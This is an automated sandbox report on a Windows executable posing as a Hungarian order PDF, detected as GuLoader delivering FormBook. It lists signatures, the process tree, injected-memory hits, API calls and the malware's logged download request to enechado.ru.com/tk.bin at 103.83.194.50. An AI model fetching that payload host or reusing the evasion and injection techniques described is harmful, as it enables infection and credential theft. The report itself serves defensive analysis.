Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe

Overview

General Information

Sample name:Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
renamed because original name is a hash value
Original sample name:Rendelsi szm 11-2024-pdf.bat.exe
Analysis ID:1562190
MD5:f669eaf2b985a35f3b1bf21d73b7caf2
SHA1:e789d818889992fae7365386a24539a4b3bf2765
SHA256:356358084caa4c8fbc4db1da7c5a15c9566182f8193dd17a979c22d0012c5016
Tags:exeHUNuser-smica83
Infos:

Detection

FormBook, GuLoader
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe (PID: 7048 cmdline: "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe" MD5: F669EAF2B985A35F3B1BF21D73B7CAF2)
    • Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe (PID: 2648 cmdline: "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe" MD5: F669EAF2B985A35F3B1BF21D73B7CAF2)
      • SkCSKJeVGx.exe (PID: 2540 cmdline: "C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sdchange.exe (PID: 1712 cmdline: "C:\Windows\SysWOW64\sdchange.exe" MD5: 8E93B557363D8400A8B9F2D70AEB222B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2971931474.0000000004A30000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.2968077635.0000000033220000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.2971855670.00000000049E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000000.00000002.2572461469.0000000004B5D000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 2 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-25T10:27:36.431130+010028032702Potentially Bad Traffic192.168.2.449813103.83.194.5080TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://enechado.ru.com/tk.binAvira URL Cloud: Label: malware
            Yara detected FormBook
            Source: Yara matchFile source: 00000007.00000002.2971931474.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2968077635.0000000033220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2971855670.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2972278364.0000000002B40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2968622258.0000000033880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: sdchange.pdbGCTL source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2899524866.0000000003414000.00000004.00000020.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2899577369.000000000341D000.00000004.00000020.00020000.00000000.sdmp, SkCSKJeVGx.exe, 00000006.00000002.2971778579.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdb source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000001.2571159157.0000000000649000.00000020.00000001.01000000.00000009.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SkCSKJeVGx.exe, 00000006.00000002.2970784574.00000000007DE000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: wntdll.pdbUGP source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2836177680.0000000033386000.00000004.00000020.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2833858757.00000000331DB000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2949048299.0000000004993000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2946820394.00000000047E6000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2836177680.0000000033386000.00000004.00000020.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2833858757.00000000331DB000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, sdchange.exe, 00000007.00000003.2949048299.0000000004993000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2946820394.00000000047E6000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000001.2571159157.0000000000649000.00000020.00000001.01000000.00000009.sdmp
            Source: Binary string: sdchange.pdb source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2899524866.0000000003414000.00000004.00000020.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2899577369.000000000341D000.00000004.00000020.00020000.00000000.sdmp, SkCSKJeVGx.exe, 00000006.00000002.2971778579.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4x nop then xor eax, eax7_2_02C59EF0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4x nop then pop edi7_2_02C5E52E
            Source: Joe Sandbox ViewIP Address: 103.83.194.50 103.83.194.50
            Source: Joe Sandbox ViewIP Address: 103.83.194.50 103.83.194.50
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49813 -> 103.83.194.50:80
            Source: global trafficHTTP traffic detected: GET /tk.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: enechado.ru.comCache-Control: no-cache
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /tk.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: enechado.ru.comCache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: enechado.ru.com
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2945021346.00000000033E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enechado.ru.com/tk.bin
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2945021346.00000000033E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enechado.ru.com/tk.binH
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2945021346.00000000033A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enechado.ru.com/tk.binK
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2945021346.00000000033A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enechado.ru.com/tk.binR
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000001.2571159157.0000000000649000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000001.2571159157.00000000005F2000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000001.2571159157.00000000005F2000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000001.2571159157.0000000000649000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 0_2_0040542B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040542B

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000007.00000002.2971931474.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2968077635.0000000033220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2971855670.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2972278364.0000000002B40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2968622258.0000000033880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A35C0 NtCreateMutant,LdrInitializeThunk,5_2_335A35C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2B60 NtClose,LdrInitializeThunk,5_2_335A2B60
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_335A2DF0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_335A2C70
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A3010 NtOpenDirectoryObject,5_2_335A3010
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A3090 NtSetValueKey,5_2_335A3090
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A39B0 NtGetContextThread,5_2_335A39B0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A3D70 NtOpenThread,5_2_335A3D70
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A3D10 NtOpenProcessToken,5_2_335A3D10
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A4340 NtSetContextThread,5_2_335A4340
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A4650 NtSuspendThread,5_2_335A4650
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2BF0 NtAllocateVirtualMemory,5_2_335A2BF0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2BE0 NtQueryValueKey,5_2_335A2BE0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2B80 NtQueryInformationFile,5_2_335A2B80
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2BA0 NtEnumerateValueKey,5_2_335A2BA0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2AD0 NtReadFile,5_2_335A2AD0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2AF0 NtWriteFile,5_2_335A2AF0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2AB0 NtWaitForSingleObject,5_2_335A2AB0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2F60 NtCreateProcessEx,5_2_335A2F60
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2F30 NtCreateSection,5_2_335A2F30
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2FE0 NtCreateFile,5_2_335A2FE0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2F90 NtProtectVirtualMemory,5_2_335A2F90
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2FB0 NtResumeThread,5_2_335A2FB0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2FA0 NtQuerySection,5_2_335A2FA0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2E30 NtWriteVirtualMemory,5_2_335A2E30
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2EE0 NtQueueApcThread,5_2_335A2EE0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2E80 NtReadVirtualMemory,5_2_335A2E80
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2EA0 NtAdjustPrivilegesToken,5_2_335A2EA0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2D10 NtMapViewOfSection,5_2_335A2D10
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2D00 NtSetInformationFile,5_2_335A2D00
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2D30 NtUnmapViewOfSection,5_2_335A2D30
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2DD0 NtDelayExecution,5_2_335A2DD0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2DB0 NtEnumerateKey,5_2_335A2DB0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2C60 NtCreateKey,5_2_335A2C60
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2C00 NtQueryInformationProcess,5_2_335A2C00
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2CC0 NtQueryVirtualMemory,5_2_335A2CC0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2CF0 NtOpenProcess,5_2_335A2CF0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2CA0 NtQueryInformationToken,5_2_335A2CA0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_04BB2CA0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_04BB2C70
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_04BB2DF0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_04BB2D10
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2FE0 NtCreateFile,LdrInitializeThunk,7_2_04BB2FE0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2F30 NtCreateSection,LdrInitializeThunk,7_2_04BB2F30
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2AD0 NtReadFile,LdrInitializeThunk,7_2_04BB2AD0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_04BB2BF0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2B60 NtClose,LdrInitializeThunk,7_2_04BB2B60
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB35C0 NtCreateMutant,LdrInitializeThunk,7_2_04BB35C0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB4650 NtSuspendThread,7_2_04BB4650
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB4340 NtSetContextThread,7_2_04BB4340
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2CF0 NtOpenProcess,7_2_04BB2CF0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2CC0 NtQueryVirtualMemory,7_2_04BB2CC0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2C00 NtQueryInformationProcess,7_2_04BB2C00
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2C60 NtCreateKey,7_2_04BB2C60
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2DB0 NtEnumerateKey,7_2_04BB2DB0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2DD0 NtDelayExecution,7_2_04BB2DD0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2D30 NtUnmapViewOfSection,7_2_04BB2D30
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2D00 NtSetInformationFile,7_2_04BB2D00
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2EA0 NtAdjustPrivilegesToken,7_2_04BB2EA0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2E80 NtReadVirtualMemory,7_2_04BB2E80
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2EE0 NtQueueApcThread,7_2_04BB2EE0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2E30 NtWriteVirtualMemory,7_2_04BB2E30
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2FB0 NtResumeThread,7_2_04BB2FB0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2FA0 NtQuerySection,7_2_04BB2FA0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2F90 NtProtectVirtualMemory,7_2_04BB2F90
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2F60 NtCreateProcessEx,7_2_04BB2F60
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2AB0 NtWaitForSingleObject,7_2_04BB2AB0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2AF0 NtWriteFile,7_2_04BB2AF0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2BA0 NtEnumerateValueKey,7_2_04BB2BA0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2B80 NtQueryInformationFile,7_2_04BB2B80
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2BE0 NtQueryValueKey,7_2_04BB2BE0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB3090 NtSetValueKey,7_2_04BB3090
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB3010 NtOpenDirectoryObject,7_2_04BB3010
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB3D10 NtOpenProcessToken,7_2_04BB3D10
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB3D70 NtOpenThread,7_2_04BB3D70
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB39B0 NtGetContextThread,7_2_04BB39B0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C79700 NtReadFile,7_2_02C79700
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C79590 NtCreateFile,7_2_02C79590
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C79A10 NtAllocateVirtualMemory,7_2_02C79A10
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C798A0 NtClose,7_2_02C798A0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeFile created: C:\Windows\resources\0809\mysterist.iniJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 0_2_00404C680_2_00404C68
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 0_2_0040698E0_2_0040698E
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 0_2_6FBC1B630_2_6FBC1B63
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355D34C5_2_3355D34C
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362132D5_2_3362132D
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335B739A5_2_335B739A
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336112ED5_2_336112ED
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358B2C05_2_3358B2C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358D2F05_2_3358D2F0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335752A05_2_335752A0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3363B16B5_2_3363B16B
